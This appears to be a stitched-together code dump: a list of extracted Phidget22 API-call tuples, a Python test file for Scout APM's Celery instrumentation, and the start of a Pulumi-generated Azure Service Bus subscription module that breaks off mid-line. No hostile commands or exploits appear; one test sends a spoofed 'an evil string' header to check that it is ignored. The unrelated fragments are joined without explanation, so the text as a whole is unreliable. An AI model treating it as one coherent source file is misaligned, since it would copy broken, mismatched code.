((6290, 6312), 'ctypes.byref', 'ctypes.byref', (['_Channel'], {}), '(_Channel)\n', (6302, 6312), False, 'import ctypes\n'), ((6341, 6365), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (6357, 6365), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((6471, 6494), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (6492, 6494), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((6616, 6640), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (6632, 6640), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((6716, 6739), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (6737, 6739), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((6829, 6856), 'ctypes.byref', 'ctypes.byref', (['_ChannelClass'], {}), '(_ChannelClass)\n', (6841, 6856), False, 'import ctypes\n'), ((6885, 6909), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (6901, 6909), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((7025, 7048), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (7046, 7048), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((7142, 7173), 'ctypes.byref', 'ctypes.byref', (['_ChannelClassName'], {}), '(_ChannelClassName)\n', (7154, 7173), False, 'import ctypes\n'), ((7202, 7226), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (7218, 7226), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((7352, 7375), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (7373, 7375), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((7464, 7490), 'ctypes.byref', 'ctypes.byref', (['_ChannelName'], {}), '(_ChannelName)\n', (7476, 7490), False, 'import ctypes\n'), ((7519, 7543), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (7535, 7543), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((7669, 7692), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (7690, 7692), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((7785, 7815), 'ctypes.byref', 'ctypes.byref', (['_ChannelSubclass'], {}), '(_ChannelSubclass)\n', (7797, 7815), False, 'import ctypes\n'), ((7844, 7868), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (7860, 7868), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((7932, 7955), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (7953, 7955), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((8062, 8086), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (8078, 8086), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((8196, 8219), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (8217, 8219), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((8321, 8341), 'ctypes.byref', 'ctypes.byref', (['_count'], {}), '(_count)\n', (8333, 8341), False, 'import ctypes\n'), ((8370, 8394), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (8386, 8394), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((8490, 8513), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (8511, 8513), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((8602, 8628), 'ctypes.byref', 'ctypes.byref', (['_DeviceClass'], {}), '(_DeviceClass)\n', (8614, 8628), False, 'import ctypes\n'), ((8657, 8681), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (8673, 8681), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((8794, 8817), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (8815, 8817), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((8910, 8940), 'ctypes.byref', 'ctypes.byref', (['_DeviceClassName'], {}), '(_DeviceClassName)\n', (8922, 8940), False, 'import ctypes\n'), ((8969, 8993), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (8985, 8993), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((9109, 9132), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (9130, 9132), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((9218, 9241), 'ctypes.byref', 'ctypes.byref', (['_DeviceID'], {}), '(_DeviceID)\n', (9230, 9241), False, 'import ctypes\n'), ((9270, 9294), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (9286, 9294), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((9396, 9419), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (9417, 9419), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((9508, 9534), 'ctypes.byref', 'ctypes.byref', (['_DeviceLabel'], {}), '(_DeviceLabel)\n', (9520, 9534), False, 'import ctypes\n'), ((9563, 9587), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (9579, 9587), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((9760, 9783), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (9781, 9783), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((9872, 9898), 'ctypes.byref', 'ctypes.byref', (['_DeviceLabel'], {}), '(_DeviceLabel)\n', (9884, 9898), False, 'import ctypes\n'), ((9927, 9951), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (9943, 9951), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((10026, 10049), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (10047, 10049), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((10137, 10162), 'ctypes.byref', 'ctypes.byref', (['_DeviceName'], {}), '(_DeviceName)\n', (10149, 10162), False, 'import ctypes\n'), ((10191, 10215), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (10207, 10215), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((10348, 10371), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (10369, 10371), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((10467, 10500), 'ctypes.byref', 'ctypes.byref', (['_DeviceSerialNumber'], {}), '(_DeviceSerialNumber)\n', (10479, 10500), False, 'import ctypes\n'), ((10529, 10553), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (10545, 10553), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((10716, 10739), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (10737, 10739), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((10883, 10907), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (10899, 10907), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((10980, 11003), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (11001, 11003), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((11090, 11114), 'ctypes.byref', 'ctypes.byref', (['_DeviceSKU'], {}), '(_DeviceSKU)\n', (11102, 11114), False, 'import ctypes\n'), ((11143, 11167), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (11159, 11167), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((11287, 11310), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (11308, 11310), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((11401, 11429), 'ctypes.byref', 'ctypes.byref', (['_DeviceVersion'], {}), '(_DeviceVersion)\n', (11413, 11429), False, 'import ctypes\n'), ((11458, 11482), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (11474, 11482), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((11573, 11596), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (11594, 11596), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((11677, 11695), 'ctypes.byref', 'ctypes.byref', (['_Hub'], {}), '(_Hub)\n', (11689, 11695), False, 'import ctypes\n'), ((11724, 11748), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (11740, 11748), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((11871, 11894), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (11892, 11894), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((11979, 12001), 'ctypes.byref', 'ctypes.byref', (['_HubPort'], {}), '(_HubPort)\n', (11991, 12001), False, 'import ctypes\n'), ((12030, 12054), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (12046, 12054), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((12160, 12183), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (12181, 12183), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((12305, 12329), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (12321, 12329), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((12405, 12428), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (12426, 12428), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((12518, 12545), 'ctypes.byref', 'ctypes.byref', (['_HubPortCount'], {}), '(_HubPortCount)\n', (12530, 12545), False, 'import ctypes\n'), ((12574, 12598), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (12590, 12598), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((12706, 12729), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (12727, 12729), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((12819, 12846), 'ctypes.byref', 'ctypes.byref', (['_HubPortSpeed'], {}), '(_HubPortSpeed)\n', (12831, 12846), False, 'import ctypes\n'), ((12875, 12899), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (12891, 12899), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((13033, 13056), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (13054, 13056), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((13188, 13212), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (13204, 13212), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((13297, 13320), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (13318, 13320), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((13413, 13443), 'ctypes.byref', 'ctypes.byref', (['_MaxHubPortSpeed'], {}), '(_MaxHubPortSpeed)\n', (13425, 13443), False, 'import ctypes\n'), ((13472, 13496), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (13488, 13496), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((13626, 13649), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (13647, 13649), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((13750, 13788), 'ctypes.byref', 'ctypes.byref', (['_HubPortSupportsSetSpeed'], {}), '(_HubPortSupportsSetSpeed)\n', (13762, 13788), False, 'import ctypes\n'), ((13817, 13841), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (13833, 13841), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((13951, 13974), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (13972, 13974), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((14061, 14085), 'ctypes.byref', 'ctypes.byref', (['_IsChannel'], {}), '(_IsChannel)\n', (14073, 14085), False, 'import ctypes\n'), ((14114, 14138), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (14130, 14138), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((14246, 14269), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (14267, 14269), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((14362, 14392), 'ctypes.byref', 'ctypes.byref', (['_IsHubPortDevice'], {}), '(_IsHubPortDevice)\n', (14374, 14392), False, 'import ctypes\n'), ((14421, 14445), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (14437, 14445), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((14591, 14614), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (14612, 14614), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((14752, 14776), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (14768, 14776), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((14842, 14865), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (14863, 14865), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((14950, 14972), 'ctypes.byref', 'ctypes.byref', (['_IsLocal'], {}), '(_IsLocal)\n', (14962, 14972), False, 'import ctypes\n'), ((15001, 15025), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (15017, 15025), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((15131, 15154), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (15152, 15154), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((15276, 15300), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (15292, 15300), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((15368, 15391), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (15389, 15391), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((15477, 15500), 'ctypes.byref', 'ctypes.byref', (['_IsRemote'], {}), '(_IsRemote)\n', (15489, 15500), False, 'import ctypes\n'), ((15529, 15553), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (15545, 15553), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((15664, 15687), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (15685, 15687), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((15811, 15835), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (15827, 15835), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((15866, 15889), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (15887, 15889), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((15995, 16019), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (16011, 16019), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((16115, 16138), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (16136, 16138), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((16271, 16295), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (16287, 16295), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((16362, 16385), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (16383, 16385), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((16469, 16490), 'ctypes.byref', 'ctypes.byref', (['_Parent'], {}), '(_Parent)\n', (16481, 16490), False, 'import ctypes\n'), ((16519, 16543), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (16535, 16543), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((16695, 16718), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (16716, 16718), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((16810, 16839), 'ctypes.byref', 'ctypes.byref', (['_ServerHostname'], {}), '(_ServerHostname)\n', (16822, 16839), False, 'import ctypes\n'), ((16868, 16892), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (16884, 16892), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((17014, 17037), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (17035, 17037), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((17125, 17150), 'ctypes.byref', 'ctypes.byref', (['_ServerName'], {}), '(_ServerName)\n', (17137, 17150), False, 'import ctypes\n'), ((17179, 17203), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (17195, 17203), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((17371, 17394), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (17392, 17394), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((17482, 17507), 'ctypes.byref', 'ctypes.byref', (['_ServerName'], {}), '(_ServerName)\n', (17494, 17507), False, 'import ctypes\n'), ((17536, 17560), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (17552, 17560), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((17643, 17666), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (17664, 17666), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((17758, 17787), 'ctypes.byref', 'ctypes.byref', (['_ServerPeerName'], {}), '(_ServerPeerName)\n', (17770, 17787), False, 'import ctypes\n'), ((17816, 17840), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (17832, 17840), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((17974, 17997), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (17995, 17997), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((18091, 18122), 'ctypes.byref', 'ctypes.byref', (['_ServerUniqueName'], {}), '(_ServerUniqueName)\n', (18103, 18122), False, 'import ctypes\n'), ((18151, 18175), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (18167, 18175), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((18315, 18338), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (18336, 18338), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((18434, 18467), 'ctypes.byref', 'ctypes.byref', (['_MaxVINTDeviceSpeed'], {}), '(_MaxVINTDeviceSpeed)\n', (18446, 18467), False, 'import ctypes\n'), ((18496, 18520), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (18512, 18520), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((18659, 18682), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (18680, 18682), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((18786, 18827), 'ctypes.byref', 'ctypes.byref', (['_VINTDeviceSupportsSetSpeed'], {}), '(_VINTDeviceSupportsSetSpeed)\n', (18798, 18827), False, 'import ctypes\n'), ((18856, 18880), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (18872, 18880), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((19054, 19077), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (19075, 19077), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((19168, 19194), 'ctypes.byref', 'ctypes.byref', (['_deviceLabel'], {}), '(_deviceLabel)\n', (19180, 19194), False, 'import ctypes\n'), ((19223, 19247), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (19239, 19247), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((1890, 1913), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (1911, 1913), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((1946, 1969), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (1967, 1969), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((2632, 2655), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (2653, 2655), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((3175, 3198), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (3196, 3198), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((3790, 3813), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (3811, 3813), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((4483, 4506), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (4504, 4506), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n')]
# coding=utf-8 from __future__ import absolute_import, division, print_function, unicode_literals from contextlib import contextmanager import celery import pytest from celery.signals import setup_logging import scout_apm.celery from scout_apm.api import Config # http://docs.celeryproject.org/en/latest/userguide/testing.html#py-test skip_unless_celery_4_plus = pytest.mark.skipif( celery.VERSION < (4, 0), reason="pytest fixtures added in Celery 4.0" ) @setup_logging.connect def do_nothing(**kwargs): # Just by connecting to this signal, we prevent Celery from setting up # logging - and stop it from interfering with global state # http://docs.celeryproject.org/en/v4.3.0/userguide/signals.html#setup-logging pass @contextmanager def app_with_scout(app=None, config=None): """ Context manager that configures a Celery app with Scout installed. """ if app is None: app = celery.Celery("tasks", broker="memory://") # Enable Scout by default in tests. if config is None: config = {"monitor": True} # Disable running the agent. config["core_agent_launch"] = False @app.task def hello(): return "Hello World!" # Setup according to https://docs.scoutapm.com/#celery Config.set(**config) scout_apm.celery.install() try: yield app finally: scout_apm.celery.uninstall() # Reset Scout configuration. Config.reset_all() def test_hello_eager(tracked_requests): with app_with_scout() as app: result = app.tasks["tests.integration.test_celery.hello"].apply() assert result.result == "Hello World!" assert len(tracked_requests) == 1 tracked_request = tracked_requests[0] assert "task_id" in tracked_request.tags assert tracked_request.tags["is_eager"] is True assert tracked_request.tags["exchange"] == "unknown" assert tracked_request.tags["routing_key"] == "unknown" assert tracked_request.tags["queue"] == "unknown" assert tracked_request.active_spans == [] assert len(tracked_request.complete_spans) == 1 span = tracked_request.complete_spans[0] assert span.operation == "Job/tests.integration.test_celery.hello" @skip_unless_celery_4_plus def test_hello_worker(celery_app, celery_worker, tracked_requests): with app_with_scout(app=celery_app) as app: result = app.tasks["tests.integration.test_celery.hello"].delay().get() assert result == "Hello World!" assert len(tracked_requests) == 1 tracked_request = tracked_requests[0] assert "task_id" in tracked_request.tags assert tracked_request.tags["is_eager"] is False assert tracked_request.tags["exchange"] == "" assert tracked_request.tags["routing_key"] == "celery" assert tracked_request.tags["queue"] == "unknown" assert ( 0.0 <= tracked_request.tags["queue_time"] < 60.0 ) # Assume test took <60 seconds assert tracked_request.active_spans == [] assert len(tracked_request.complete_spans) == 1 span = tracked_request.complete_spans[0] assert span.operation == "Job/tests.integration.test_celery.hello" @skip_unless_celery_4_plus def test_hello_worker_header_preset(celery_app, celery_worker, tracked_requests): with app_with_scout(app=celery_app) as app: result = ( app.tasks["tests.integration.test_celery.hello"] .apply_async(headers={"scout_task_start": "an evil string"}) .get() ) assert result == "Hello World!" assert len(tracked_requests) == 1 tracked_request = tracked_requests[0] assert tracked_request.active_spans == [] assert len(tracked_request.complete_spans) == 1 span = tracked_request.complete_spans[0] assert span.operation == "Job/tests.integration.test_celery.hello" assert "queue_time" not in span.tags @skip_unless_celery_4_plus def test_hello_worker_chain(celery_app, celery_worker, tracked_requests): with app_with_scout(app=celery_app) as app: hello = app.tasks["tests.integration.test_celery.hello"] result = (hello.si() | hello.si()).apply_async().get() assert result == "Hello World!" assert len(tracked_requests) == 2 assert [t.complete_spans[0].operation for t in tracked_requests] == [ "Job/tests.integration.test_celery.hello", "Job/tests.integration.test_celery.hello", ] assert "parent_task_id" not in tracked_requests[0].tags first_task_id = tracked_requests[0].tags["task_id"] assert tracked_requests[1].tags["parent_task_id"] == first_task_id def test_no_monitor(tracked_requests): # With an empty config, "monitor" defaults to False. with app_with_scout(config={}) as app: result = app.tasks["tests.integration.test_celery.hello"].apply() assert result.result == "Hello World!" assert tracked_requests == []
[ "scout_apm.api.Config.set", "celery.Celery", "scout_apm.api.Config.reset_all", "pytest.mark.skipif" ]
[((367, 461), 'pytest.mark.skipif', 'pytest.mark.skipif', (['(celery.VERSION < (4, 0))'], {'reason': '"""pytest fixtures added in Celery 4.0"""'}), "(celery.VERSION < (4, 0), reason=\n 'pytest fixtures added in Celery 4.0')\n", (385, 461), False, 'import pytest\n'), ((1268, 1288), 'scout_apm.api.Config.set', 'Config.set', ([], {}), '(**config)\n', (1278, 1288), False, 'from scout_apm.api import Config\n'), ((926, 968), 'celery.Celery', 'celery.Celery', (['"""tasks"""'], {'broker': '"""memory://"""'}), "('tasks', broker='memory://')\n", (939, 968), False, 'import celery\n'), ((1443, 1461), 'scout_apm.api.Config.reset_all', 'Config.reset_all', ([], {}), '()\n', (1459, 1461), False, 'from scout_apm.api import Config\n')]
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi SDK Generator. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from ... import _utilities from . import outputs __all__ = [ 'GetSubscriptionResult', 'AwaitableGetSubscriptionResult', 'get_subscription', ] @pulumi.output_type class GetSubscriptionResult: """ Description of subscription resource. """ def __init__(__self__, accessed_at=None, auto_delete_on_idle=None, client_affine_properties=None, count_details=None, created_at=None, dead_lettering_on_filter_evaluation_exceptions=None, dead_lettering_on_message_expiration=None, default_message_time_to_live=None, duplicate_detection_history_time_window=None, enable_batched_operations=None, forward_dead_lettered_messages_to=None, forward_to=None, id=None, is_client_affine=None, lock_duration=None, max_delivery_count=None, message_count=None, name=None, requires_session=None, status=None, system_data=None, type=None, updated_at=None): if accessed_at and not isinstance(accessed_at, str): raise TypeError("Expected argument 'accessed_at' to be a str") pulumi.set(__self__, "accessed_at", accessed_at) if auto_delete_on_idle and not isinstance(auto_delete_on_idle, str): raise TypeError("Expected argument 'auto_delete_on_idle' to be a str") pulumi.set(__self__, "auto_delete_on_idle", auto_delete_on_idle) if client_affine_properties and not isinstance(client_affine_properties, dict): raise TypeError("Expected argument 'client_affine_properties' to be a dict") pulumi.set(__self__, "client_affine_properties", client_affine_properties) if count_details and not isinstance(count_details, dict): raise TypeError("Expected argument 'count_details' to be a dict") pulumi.set(__self__, "count_details", count_details) if created_at and not isinstance(created_at, str): raise TypeError("Expected argument 'created_at' to be a str") pulumi.set(__self__, "created_at", created_at) if dead_lettering_on_filter_evaluation_exceptions and not isinstance(dead_lettering_on_filter_evaluation_exceptions, bool): raise TypeError("Expected argument 'dead_lettering_on_filter_evaluation_exceptions' to be a bool") pulumi.set(__self__, "dead_lettering_on_filter_evaluation_exceptions", dead_lettering_on_filter_evaluation_exceptions) if dead_lettering_on_message_expiration and not isinstance(dead_lettering_on_message_expiration, bool): raise TypeError("Expected argument 